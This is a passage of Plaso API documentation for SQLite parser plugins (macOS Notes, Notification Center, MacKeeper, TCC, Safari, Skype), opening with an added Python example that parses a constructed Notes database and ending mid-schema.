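The mac_notes plugin above illustrates the contract every SQLitePlugin on this page follows: REQUIRED_STRUCTURE decides whether the plugin is selected for a database, QUERIES are then run against it, and each row becomes event data. The following added example (not Plaso's code) builds an in-memory stand-in for NotesV7.storedata from the ZNOTE/ZNOTEBODY schema listed above, applies that structure check, runs the plugin's query, and turns rows into MacNotesEventData-like records; it assumes the TIMESTAMP columns hold Core Data dates (seconds since 2001-01-01 UTC) and derives the plain note text from ZHTMLSTRING with the standard-library HTML parser, and the sample note is constructed.

```python
import html.parser
import sqlite3
from datetime import datetime, timedelta, timezone

# ZNOTE/ZNOTEBODY schema and the query of the mac_notes plugin as listed on the
# page (run-together tokens in the page's schema string spaced out).
SCHEMAS = {
    'ZNOTE': (
        'CREATE TABLE ZNOTE ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, Z_OPT INTEGER, '
        'ZBODY INTEGER, ZFOLDER INTEGER, Z6_FOLDER INTEGER, ZMIMEDATASIZE INTEGER, '
        'ZDATECREATED TIMESTAMP, ZDATEEDITED TIMESTAMP, ZREMOTEID VARCHAR, '
        'ZTITLE VARCHAR, ZCHANGEKEY VARCHAR, ZUNIVERSALLYUNIQUEID BLOB )'),
    'ZNOTEBODY': (
        'CREATE TABLE ZNOTEBODY ( Z_PK INTEGER PRIMARY KEY, Z_ENT INTEGER, '
        'Z_OPT INTEGER, ZNOTE INTEGER, Z10_NOTE INTEGER, ZHTMLSTRING VARCHAR )'),
}
REQUIRED_STRUCTURE = {
    'ZNOTE': frozenset({'ZDATECREATED', 'ZDATEEDITED', 'ZTITLE'}),
    'ZNOTEBODY': frozenset({'ZHTMLSTRING'}),
}
QUERY = (
    'SELECT ZNOTEBODY.ZHTMLSTRING AS zhtmlstring, ZNOTE.ZDATECREATED AS timestamp, '
    'ZNOTE.ZDATEEDITED AS last_modified_time, ZNOTE.ZTITLE as title '
    'FROM ZNOTEBODY, ZNOTE WHERE ZNOTEBODY.Z_PK = ZNOTE.Z_PK')
# Assumption: TIMESTAMP columns hold Core Data NSDate values (seconds since 2001-01-01 UTC).
COCOA_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)


def missing_structure(connection, required_structure):
    """Returns {table: missing columns}; empty means REQUIRED_STRUCTURE is met
    and the plugin would be selected for this database."""
    missing = {}
    for table, columns in required_structure.items():
        # Table names come from the plugin constant, not from the evidence file.
        rows = connection.execute(f'PRAGMA table_info("{table}")').fetchall()
        absent = set(columns) - {row[1] for row in rows}  # field 1 is the name
        if absent:  # also true when the table itself is missing (no rows)
            missing[table] = absent
    return missing


class _TextExtractor(html.parser.HTMLParser):
    """Collects the text nodes of a ZHTMLSTRING note body."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def handle_data(self, data):
        if data.strip():
            self.parts.append(data.strip())


def html_to_text(html_string):
    """Flattens the HTML note body into the plain 'text' attribute."""
    extractor = _TextExtractor()
    extractor.feed(html_string or '')
    extractor.close()
    return ' '.join(extractor.parts)


def cocoa_to_iso8601(seconds):
    """Core Data seconds -> ISO 8601 UTC string; NULL stays None."""
    if seconds is None:
        return None
    return (COCOA_EPOCH + timedelta(seconds=seconds)).strftime('%Y-%m-%dT%H:%M:%SZ')


def extract_note_events(connection):
    """Runs the plugin query and builds one MacNotesEventData-like dict per row."""
    if missing_structure(connection, REQUIRED_STRUCTURE):
        return []  # plugin does not apply; nothing to parse
    return [{
        'data_type': 'mac:notes:note',
        'title': row['title'],
        'text': html_to_text(row['zhtmlstring']),
        'creation_time': cocoa_to_iso8601(row['timestamp']),
        'modification_time': cocoa_to_iso8601(row['last_modified_time']),
    } for row in connection.execute(QUERY)]


def build_sample_database(include_body=True):
    """Constructed in-memory stand-in for NotesV7.storedata (not real evidence);
    include_body=False omits ZNOTEBODY so the structure check fails."""
    connection = sqlite3.connect(':memory:')
    connection.row_factory = sqlite3.Row
    connection.execute(SCHEMAS['ZNOTE'])
    created = 644630400.0  # 2021-06-06 00:00:00 UTC in Cocoa seconds
    connection.execute(
        'INSERT INTO ZNOTE (Z_PK, ZBODY, ZDATECREATED, ZDATEEDITED, ZTITLE) '
        'VALUES (?, ?, ?, ?, ?)', (1, 1, created, created + 3600, 'Shopping list'))
    if include_body:
        connection.execute(SCHEMAS['ZNOTEBODY'])
        connection.execute(
            'INSERT INTO ZNOTEBODY (Z_PK, ZNOTE, ZHTMLSTRING) VALUES (?, ?, ?)',
            (1, 1, '<html><body><div>Milk &amp; eggs<br>Bread</div></body></html>'))
    connection.commit()
    return connection
```

Calling extract_note_events(build_sample_database()) yields one record with both timestamps converted; with include_body=False the structure check reports the missing ZNOTEBODY table and no events are produced.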


plaso.parsers.sqlite_plugins.mac_notificationcenter module

SQLite parser plugin for MacOS Notification Center database files.

class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterEventData
Bases: plaso.containers.events.EventData

MacOS NotificationCenter event data.

    • body (str) – body of the notification message.
    • bundle_name (str) – name of the application's bundle that generated the notification.
    • presented (int) – 1 if the notification has been shown to the user, otherwise 0.
    • subtitle (str) – optional. Subtitle of the notification message.
    • title (str) – title of the message. Usually the name of the application that generated the notification; occasionally the name of the sender of the notification, for example in the case of chat messages.

    DATA_TYPE = 'mac:notificationcenter:db'

class plaso.parsers.sqlite_plugins.mac_notificationcenter.MacNotificationCenterPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS Notification Center database files.

The MacOS Notification Center database file is typically stored in: /private/var/folders//../0/com.apple.notificationcenter/db2/db

At the moment it takes into consideration only the main table, 'record'.

Currently supported tables and related content:
    • Record: contains historical records
    • Requests: contain pending requests
    • Delivered: delivered requests
    • Displayed: displayed requests, by app_id
    • Snoozed: snoozed by user requests

    DATA_FORMAT = 'MacOS Notification Center SQLite database file'

    NAME = 'mac_notificationcenter'

    ParseNotificationcenterRow(parser_mediator, query, row, **unused_kwargs)
        Parses a message row.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.


    QUERIES = [('SELECT a.identifier AS bundle_name, r.data AS dataBlob, r.delivered_date AS timestamp,r.presented AS presented FROM app a, record r WHERE a.app_id = r.app_id', 'ParseNotificationcenterRow')]

    REQUIRED_STRUCTURE = {'app': frozenset({'app_id', 'identifier'}), 'record': frozenset({'app_id', 'data', 'delivered_date', 'presented'})}

    SCHEMAS = [{'app': 'CREATE TABLE app (app_id INTEGER PRIMARY KEY, identifier VARCHAR)', 'dbinfo': 'CREATE TABLE dbinfo (key VARCHAR, value VARCHAR)', 'delivered': 'CREATE TABLE delivered (app_id INTEGER PRIMARY KEY, list BLOB)', 'displayed': 'CREATE TABLE displayed (app_id INTEGER PRIMARY KEY, list BLOB)', 'record': 'CREATE TABLE record (rec_id INTEGER PRIMARY KEY, app_id INTEGER, uuid BLOB, data BLOB, request_date REAL, request_last_date REAL, delivered_date REAL, presented Bool, style INTEGER, snooze_fire_date REAL)', 'requests': 'CREATE TABLE requests (app_id INTEGER PRIMARY KEY, list BLOB)', 'snoozed': 'CREATE TABLE snoozed (app_id INTEGER PRIMARY KEY, list BLOB)'}]

plaso.parsers.sqlite_plugins.mackeeper_cache module

SQLite parser plugin for MacOS MacKeeper cache database files.

class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCacheEventData
Bases: plaso.containers.events.EventData

MacKeeper Cache event data.

    • description (str) – description.
    • event_type (str) – event type.
    • offset (str) – identifier of the row, from which the event data was extracted.
    • query (str) – SQL query that was used to obtain the event data.
    • record_id (int) – record identifier.
    • room (str) – room.
    • text (str) – text.


    • url (str) – URL.
    • user_name (str) – user name.
    • user_sid (str) – user security identifier (SID).

    DATA_TYPE = 'mackeeper:cache'

class plaso.parsers.sqlite_plugins.mackeeper_cache.MacKeeperCachePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS MacKeeper cache database files.

    DATA_FORMAT = 'MacOS MacKeeper cache SQLite database file'

    NAME = 'mackeeper_cache'

    ParseReceiverData(parser_mediator, query, row, **unused_kwargs)
        Parses a single row from the receiver and cache response table.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.

    QUERIES = [('SELECT d.entry_ID AS id, d.receiver_data AS data, r.request_key, r.time_stamp AS time_string FROM cfurl_cache_receiver_data d, cfurl_cache_response r WHERE r.entry_ID = d.entry_ID', 'ParseReceiverData')]

    REQUIRED_STRUCTURE = {'cfurl_cache_blob_data': frozenset({}), 'cfurl_cache_receiver_data': frozenset({'entry_ID', 'receiver_data'}), 'cfurl_cache_response': frozenset({'entry_ID', 'request_key', 'time_stamp'})}

    SCHEMAS = [{'cfurl_cache_blob_data': 'CREATE TABLE cfurl_cache_blob_data(entry_ID INTEGER PRIMARY KEY, response_object BLOB, request_object BLOB, proto_props BLOB, user_info BLOB)', 'cfurl_cache_receiver_data': 'CREATE TABLE cfurl_cache_receiver_data(entry_ID INTEGER PRIMARY KEY, receiver_data BLOB)', 'cfurl_cache_response': 'CREATE TABLE cfurl_cache_response(entry_ID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, version INTEGER, hash_value INTEGER, storage_policy INTEGER, request_key TEXT UNIQUE, time_stamp NOT NULL DEFAULT CURRENT_TIMESTAMP, partition TEXT)', 'cfurl_cache_schema_version': 'CREATE TABLE cfurl_cache_schema_version(schema_version INTEGER)'}]

plaso.parsers.sqlite_plugins.macos_tcc module

SQLite parser plugin for MacOS TCC database files.

class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCEntry
Bases: plaso.containers.events.EventData

macOS TCC event data.

    • allowed (bool) – whether access to the service was allowed.
    • client (str) – name of the client requesting access to the service.
    • prompt_count (int) – number of times an application prompted the user for access to a service.
    • query (str) – SQL query that was used to obtain the event data.
    • service (str) – name of the service.

    DATA_TYPE = 'macos:tcc_entry'

class plaso.parsers.sqlite_plugins.macos_tcc.MacOSTCCPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for MacOS TCC database files.

The MacOS Transparency, Consent, and Control (TCC) database file is typically stored in:
    /Library/Application Support/com.apple.TCC/TCC.db
    /Users//Library/Application Support/com.apple.TCC/TCC.db

    DATA_FORMAT = 'MacOS Transaprency, Consent, Control (TCC) SQLite database (TCC.db) file'

    NAME = 'macostcc'

    ParseTCCEntry(parser_mediator, query, row, **unused_kwargs)
        Parses an application usage row.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.

    QUERIES = [('SELECT service, client, allowed, prompt_count, last_modified FROM access;', 'ParseTCCEntry')]


    REQUIRED_STRUCTURE = {'access': frozenset({'allowed', 'client', 'last_modified', 'prompt_count', 'service'}), 'access_overrides': frozenset({}), 'active_policy': frozenset({}), 'admin': frozenset({}), 'expired': frozenset({}), 'policies': frozenset({})}

    SCHEMAS = [{'access': "CREATE TABLE access ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, allowed INTEGER NOT NULL, prompt_count INTEGER NOT NULL, csreq BLOB, policy_id INTEGER, indirect_object_identifier_type INTEGER, indirect_object_identifier TEXT, indirect_object_code_identity BLOB, flags INTEGER, last_modified INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type, indirect_object_identifier), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE)", 'access_overrides': 'CREATE TABLE access_overrides ( service TEXT NOT NULL PRIMARY KEY)', 'active_policy': 'CREATE TABLE active_policy ( client TEXT NOT NULL, client_type INTEGER NOT NULL, policy_id INTEGER NOT NULL, PRIMARY KEY (client, client_type), FOREIGN KEY (policy_id) REFERENCES policies(id) ON DELETE CASCADE ON UPDATE CASCADE)', 'admin': 'CREATE TABLE admin (key TEXT PRIMARY KEY NOT NULL, value INTEGER NOT NULL)', 'expired': "CREATE TABLE expired ( service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL, csreq BLOB, last_modified INTEGER NOT NULL , expired_at INTEGER NOT NULL DEFAULT (CAST(strftime('%s','now') AS INTEGER)), PRIMARY KEY (service, client, client_type))", 'policies': 'CREATE TABLE policies ( id INTEGER NOT NULL PRIMARY KEY, bundle_id TEXT NOT NULL, uuid TEXT NOT NULL, display TEXT NOT NULL, UNIQUE (bundle_id, uuid))'}]

plaso.parsers.sqlite_plugins.safari module

SQLite parser plugin for Safari history database files.

class plaso.parsers.sqlite_plugins.safari.SafariHistoryPageVisitedEventData
Bases: plaso.containers.events.EventData

Safari history event data.

    • host (str) – hostname of the server.
    • offset (str) – identifier of the row, from which the event data was extracted.
    • query (str) – SQL query that was used to obtain the event data.
    • title (str) – title of the webpage visited.
    • url (str) – URL visited.
    • visit_count (int) – number of times the website was visited.


    • was_http_non_get (bool) – True if the webpage was visited using a non-GET HTTP request.

    DATA_TYPE = 'safari:history:visit_sqlite'

class plaso.parsers.sqlite_plugins.safari.SafariHistoryPluginSqlite
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Safari history database files.

The Safari history database file is typically stored in: History.db

    DATA_FORMAT = 'Safari history SQLite database (History.db) file'

    NAME = 'safari_historydb'

    ParsePageVisitRow(parser_mediator, query, row, **unused_kwargs)
        Parses a visited row.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row.

    QUERIES = [('SELECT history_items.id, history_items.url, history_items.visit_count, history_visits.id AS visit_id, history_visits.history_item,history_visits.visit_time, history_visits.redirect_destination, history_visits.title, history_visits.http_non_get, history_visits.redirect_source FROM history_items, history_visits WHERE history_items.id = history_visits.history_item ORDER BY history_visits.visit_time', 'ParsePageVisitRow')]

    REQUIRED_STRUCTURE = {'history_items': frozenset({'id', 'url', 'visit_count'}), 'history_visits': frozenset({'history_item', 'http_non_get', 'id', 'redirect_destination', 'redirect_source', 'title', 'visit_time'})}


    SCHEMAS = [{'history_client_versions': 'CREATE TABLE history_client_versions (client_version INTEGER PRIMARY KEY,last_seen REAL NOT NULL)', 'history_event_listeners': 'CREATE TABLE history_event_listeners (listener_name TEXT PRIMARY KEY NOT NULL UNIQUE,last_seen REAL NOT NULL)', 'history_events': 'CREATE TABLE history_events (id INTEGER PRIMARY KEY AUTOINCREMENT,event_type TEXT NOT NULL,event_time REAL NOT NULL,pending_listeners TEXT NOT NULL,value BLOB)', 'history_items': 'CREATE TABLE history_items (id INTEGER PRIMARY KEY AUTOINCREMENT,url TEXT NOT NULL UNIQUE,domain_expansion TEXT NULL,visit_count INTEGER NOT NULL,daily_visit_counts BLOB NOT NULL,weekly_visit_counts BLOB NULL,autocomplete_triggers BLOB NULL,should_recompute_derived_visit_counts INTEGER NOT NULL,visit_count_score INTEGER NOT NULL)', 'history_tombstones': 'CREATE TABLE history_tombstones (id INTEGER PRIMARY KEY AUTOINCREMENT,start_time REAL NOT NULL,end_time REAL NOT NULL,url TEXT,generation INTEGER NOT NULL DEFAULT 0)', 'history_visits': 'CREATE TABLE history_visits (id INTEGER PRIMARY KEY AUTOINCREMENT,history_item INTEGER NOT NULL REFERENCES history_items(id) ON DELETE CASCADE,visit_time REAL NOT NULL,title TEXT NULL,load_successful BOOLEAN NOT NULL DEFAULT 1,http_non_get BOOLEAN NOT NULL DEFAULT 0,synthesized BOOLEAN NOT NULL DEFAULT 0,redirect_source INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,redirect_destination INTEGER NULL UNIQUE REFERENCES history_visits(id) ON DELETE CASCADE,origin INTEGER NOT NULL DEFAULT 0,generation INTEGER NOT NULL DEFAULT 0,attributes INTEGER NOT NULL DEFAULT 0,score INTEGER NOT NULL DEFAULT 0)', 'metadata': 'CREATE TABLE metadata (key TEXT NOT NULL UNIQUE, value)'}]

plaso.parsers.sqlite_plugins.skype module

SQLite parser plugin for Skype database files.

class plaso.parsers.sqlite_plugins.skype.SkypeAccountEventData
Bases: plaso.containers.events.EventData

Skype account event data.

    • country (str) – home country of the account holder.
    • display_name (str) – display name of the account holder.
    • email (str) – registered email address of the account holder.
    • offset (str) – identifier of the row, from which the event data was extracted.
    • query (str) – SQL query that was used to obtain the event data.


    • username (str) – full name of the Skype account holder and display name.

    DATA_TYPE = 'skype:event:account'

class plaso.parsers.sqlite_plugins.skype.SkypeCallEventData
Bases: plaso.containers.events.EventData

Skype call event data.

    • call_type (str) – call type, such as: WAITING, STARTED, FINISHED.
    • dst_call (str) – account which received the call.
    • offset (str) – identifier of the row, from which the event data was extracted.
    • query (str) – SQL query that was used to obtain the event data.
    • src_call (str) – account which started the call.
    • user_start_call (bool) – True if the owner account started the call.
    • video_conference (bool) – True if the call was a video conference.

    DATA_TYPE = 'skype:event:call'

class plaso.parsers.sqlite_plugins.skype.SkypeChatEventData
Bases: plaso.containers.events.EventData

Skype chat event data.

    • from_account (str) – from display name and the author.
    • query (str) – SQL query that was used to obtain the event data.
    • text (str) – body XML.


    • title (str) – title.
    • to_account (str) – accounts, excluding the author, of the conversation.

    DATA_TYPE = 'skype:event:chat'

class plaso.parsers.sqlite_plugins.skype.SkypePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin

SQLite parser plugin for Skype database files.

    DATA_FORMAT = 'Skype SQLite database (main.db) file'

    NAME = 'skype'

    ParseAccountInformation(parser_mediator, query, row, **unused_kwargs)
        Parses account information.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row with account information.

    ParseCall(parser_mediator, query, row, **unused_kwargs)
        Parses a call.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (Optional[str]) – query that created the row.
            • row (sqlite3.Row) – row resulting from query.
            • query – query.

    ParseChat(parser_mediator, query, row, **unused_kwargs)
        Parses a chat message.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row resulting from query.

    ParseFileTransfer(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
        Parses a file transfer.

        There is no direct relationship between who sends the file and who accepts the file.

        Parameters


            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row resulting from query.
            • cache (Optional[SQLiteCache]) – cache.
            • database (Optional[SQLiteDatabase]) – database.

    ParseSMS(parser_mediator, query, row, **unused_kwargs)
        Parses an SMS.

        Parameters
            • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
            • query (str) – query that created the row.
            • row (sqlite3.Row) – row resulting from query.

    QUERIES = [('SELECT c.id, c.participants, c.friendlyname AS title, m.author AS author, m.from_dispname AS from_displayname, m.body_xml, m.timestamp, c.dialog_partner FROM Chats c, Messages m WHERE c.name = m.chatname', 'ParseChat'), ('SELECT id, fullname, given_displayname, emails, country, profile_timestamp, authreq_timestamp, lastonline_timestamp, mood_timestamp, sent_authrequest_time, lastused_timestamp FROM Accounts', 'ParseAccountInformation'), ('SELECT id, target_numbers AS dstnum_sms, timestamp AS time_sms, body AS msg_sms FROM SMSes', 'ParseSMS'), ('SELECT id, partner_handle, partner_dispname, offer_send_list, starttime, accepttime, finishtime, filepath, filename, filesize, status, parent_id, pk_id FROM Transfers', 'ParseFileTransfer'), ('SELECT c.id, cm.guid, c.is_incoming, cm.call_db_id, cm.videostatus, c.begin_timestamp AS try_call, cm.start_timestamp AS accept_call, cm.call_duration FROM Calls c, CallMembers cm WHERE c.id = cm.call_db_id;', 'ParseCall')]

    QUERY_DEST_FROM_TRANSFER = 'SELECT parent_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers'

    QUERY_SOURCE_FROM_TRANSFER = 'SELECT pk_id, partner_handle AS skypeid, partner_dispname AS skypename FROM transfers'

    REQUIRED_STRUCTURE = {'Accounts': frozenset({'authreq_timestamp', 'country', 'emails', 'fullname', 'given_displayname', 'id', 'lastonline_timestamp', 'mood_timestamp', 'profile_timestamp', 'sent_authrequest_time'}), 'CallMembers': frozenset({'call_db_id', 'call_duration', 'guid', 'start_timestamp', 'videostatus'}), 'Calls': frozenset({'begin_timestamp', 'id', 'is_incoming'}), 'Chats': frozenset({'dialog_partner', 'friendlyname', 'id', 'name', 'participants'}), 'Messages': frozenset({'author', 'body_xml', 'chatname', 'from_dispname', 'timestamp'}), 'SMSes': frozenset({'body', 'id', 'target_numbers', 'timestamp'}), 'Transfers': frozenset({'accepttime', 'filename', 'filepath', 'filesize', 'finishtime', 'id', 'offer_send_list', 'parent_id', 'partner_dispname', 'partner_handle', 'pk_id', 'starttime', 'status'})}


SCHEMAS = [{'Accounts': 'CREATE TABLE Accounts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, status INTEGER, pwdchangestatus INTEGER, logoutreason INTEGER, commitstatus INTEGER, suggested_skypename TEXT, skypeout_balance_currency TEXT, skypeout_balance INTEGER, skypeout_precision INTEGER, skypein_numbers TEXT, subscriptions TEXT, cblsyncstatus INTEGER, offline_callforward TEXT, chat_policy INTEGER, skype_call_policy INTEGER, pstn_call_policy INTEGER, avatar_policy INTEGER, buddycount_policy INTEGER, timezone_policy INTEGER, webpresence_policy INTEGER, phonenumbers_policy INTEGER, voicemail_policy INTEGER, authrequest_policy INTEGER, ad_policy INTEGER, partner_optedout TEXT, service_provider_info TEXT, registration_timestamp INTEGER, nr_of_other_instances INTEGER, partner_channel_status TEXT, flamingo_xmpp_status INTEGER, federated_presence_policy INTEGER, liveid_membername TEXT, roaming_history_enabled INTEGER, cobrand_id INTEGER, owner_under_legal_age INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, homepage TEXT, about TEXT, profile_timestamp INTEGER, received_authrequest TEXT, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, aliases TEXT, authreq_timestamp INTEGER, mood_text TEXT, timezone INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, given_displayname TEXT, availability INTEGER, lastonline_timestamp INTEGER, capabilities BLOB, avatar_image BLOB, assigned_speeddial TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_comment TEXT, alertstring TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, rich_mood_text TEXT, synced_email BLOB, set_availability INTEGER, options_change_future BLOB, cbl_profile_blob BLOB, authorized_time INTEGER, sent_authrequest TEXT, sent_authrequest_time INTEGER, sent_authrequest_serial INTEGER, buddyblob BLOB, 
cbl_future BLOB, node_capabilities INTEGER, node_capabilities_and INTEGER, revoked_auth INTEGER, added_in_shared_group INTEGER, in_shared_group INTEGER, authreq_history BLOB, profile_attachments BLOB, stack_version INTEGER, offline_authreq_id INTEGER, verified_email BLOB, verified_company BLOB, uses_jcs INTEGER)', 'Alerts': 'CREATE TABLE Alerts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, timestamp INTEGER, partner_name TEXT, is_unseen INTEGER, partner_id INTEGER, partner_event TEXT, partner_history TEXT, partner_header TEXT, partner_logo TEXT, meta_expiry INTEGER, message_header_caption TEXT, message_header_title TEXT, message_header_subject TEXT, message_header_cancel TEXT, message_header_later TEXT, message_content TEXT, message_footer TEXT, message_button_caption TEXT, message_button_uri TEXT, message_type INTEGER, window_size INTEGER, chatmsg_guid BLOB, notification_id INTEGER, event_flags INTEGER, extprop_hide_from_history INTEGER)', 'AppSchemaVersion': 'CREATE TABLE AppSchemaVersion (ClientVersion TEXT NOT NULL, SQLiteSchemaVersion INTEGER NOT NULL, SchemaUpdateType INTEGER NOT NULL)', 'CallMembers': 'CREATE TABLE CallMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, identity TEXT, dispname TEXT, languages TEXT, call_duration INTEGER, price_per_minute INTEGER, price_precision INTEGER, price_currency TEXT, payment_category TEXT, type INTEGER, status INTEGER, failurereason INTEGER, sounderror_code INTEGER, soundlevel INTEGER, pstn_statustext TEXT, pstn_feedback TEXT, forward_targets TEXT, forwarded_by TEXT, debuginfo TEXT, videostatus INTEGER, target_identity TEXT, mike_status INTEGER, is_read_only INTEGER, quality_status INTEGER, call_name TEXT, transfer_status INTEGER, transfer_active INTEGER, transferred_by TEXT, transferred_to TEXT, guid TEXT, next_redial_time INTEGER, nrof_redials_done INTEGER, nrof_redials_left INTEGER, transfer_topic TEXT, real_identity TEXT, start_timestamp INTEGER, is_conference INTEGER, quality_problems TEXT, 
identity_type INTEGER, country TEXT, creation_timestamp INTEGER, stats_xml TEXT, is_premium_video_sponsor INTEGER, is_multiparty_video_capable INTEGER, recovery_in_progress INTEGER, nonse_word TEXT, nr_of_delivered_push_notifications INTEGER, call_session_guid TEXT, version_string TEXT, pk_status INTEGER, call_db_id INTEGER, prime_status INTEGER)', 'Calls': 'CREATE TABLE Calls (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, begin_timestamp INTEGER, topic TEXT, is_muted INTEGER, is_unseen_missed INTEGER, host_identity TEXT, mike_status INTEGER, duration INTEGER, soundlevel INTEGER, access_token TEXT, active_members INTEGER, is_active INTEGER, name TEXT, video_disabled INTEGER, joined_existing INTEGER, server_identity TEXT, vaa_input_status INTEGER, is_incoming INTEGER, is_conference INTEGER, is_on_hold INTEGER, start_timestamp INTEGER, quality_problems TEXT, current_video_audience TEXT, premium_video_status INTEGER, premium_video_is_grace_period INTEGER, is_premium_video_sponsor INTEGER, premium_video_sponsor_list TEXT, old_members BLOB, partner_handle TEXT, partner_dispname TEXT, type INTEGER, status INTEGER, failurereason INTEGER, failurecode INTEGER, pstn_number TEXT, old_duration INTEGER, conf_participants BLOB, pstn_status TEXT, members BLOB, conv_dbid INTEGER)', 'ChatMembers': 'CREATE TABLE ChatMembers (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, chatname TEXT, identity TEXT, role INTEGER, is_active INTEGER, cur_activities INTEGER, adder TEXT)', 'Chats': 'CREATE TABLE Chats (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, name TEXT, options INTEGER, friendlyname TEXT, description TEXT, timestamp INTEGER, activity_timestamp INTEGER, dialog_partner TEXT, adder TEXT, type INTEGER, mystatus INTEGER, myrole INTEGER, posters TEXT, participants TEXT, applicants TEXT, banned_users TEXT, name_text TEXT, topic TEXT, topic_xml TEXT, guidelines TEXT, picture BLOB, alertstring TEXT, is_bookmarked INTEGER, passwordhint 
TEXT, unconsumed_suppressed_msg INTEGER, unconsumed_normal_msg INTEGER, unconsumed_elevated_msg INTEGER, unconsumed_msg_voice INTEGER, activemembers TEXT, state_data BLOB, lifesigns INTEGER, last_change INTEGER, first_unread_message INTEGER, pk_type INTEGER, dbpath TEXT, split_friendlyname TEXT, conv_dbid INTEGER)', 'ContactGroups': 'CREATE TABLE ContactGroups (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, custom_group_id INTEGER, given_displayname TEXT, nrofcontacts INTEGER, nrofcontacts_online INTEGER, given_sortorder INTEGER, type_old INTEGER, proposer TEXT, description TEXT, associated_chat TEXT, members TEXT, cbl_id INTEGER, cbl_blob BLOB, fixed INTEGER, keep_sharedgroup_contacts INTEGER, chats TEXT, extprop_is_hidden INTEGER, extprop_sortorder_value INTEGER, extprop_is_expanded INTEGER)', 'Contacts': 'CREATE TABLE Contacts (id INTEGER NOT NULL PRIMARY KEY, is_permanent INTEGER, type INTEGER, skypename TEXT, pstnnumber TEXT, aliases TEXT, fullname TEXT, birthday INTEGER, gender INTEGER, languages TEXT, country TEXT, province TEXT, city TEXT, phone_home TEXT, phone_office TEXT, phone_mobile TEXT, emails TEXT, hashed_emails TEXT, homepage TEXT, about TEXT, avatar_image BLOB, mood_text TEXT, rich_mood_text TEXT, timezone INTEGER, capabilities BLOB, profile_timestamp INTEGER, nrof_authed_buddies INTEGER, ipcountry TEXT, avatar_timestamp INTEGER, mood_timestamp INTEGER, received_authrequest TEXT, authreq_timestamp INTEGER, lastonline_timestamp INTEGER, availability INTEGER, displayname TEXT, refreshing INTEGER, given_authlevel INTEGER, given_displayname TEXT, assigned_speeddial TEXT, assigned_comment TEXT, alertstring TEXT, lastused_timestamp INTEGER, authrequest_count INTEGER, assigned_phone1 TEXT, assigned_phone1_label TEXT, assigned_phone2 TEXT, assigned_phone2_label TEXT, assigned_phone3 TEXT, assigned_phone3_label TEXT, buddystatus INTEGER, isauthorized INTEGER, popularity_ord INTEGER, external_id TEXT, external_system_id TEXT, isblocked 
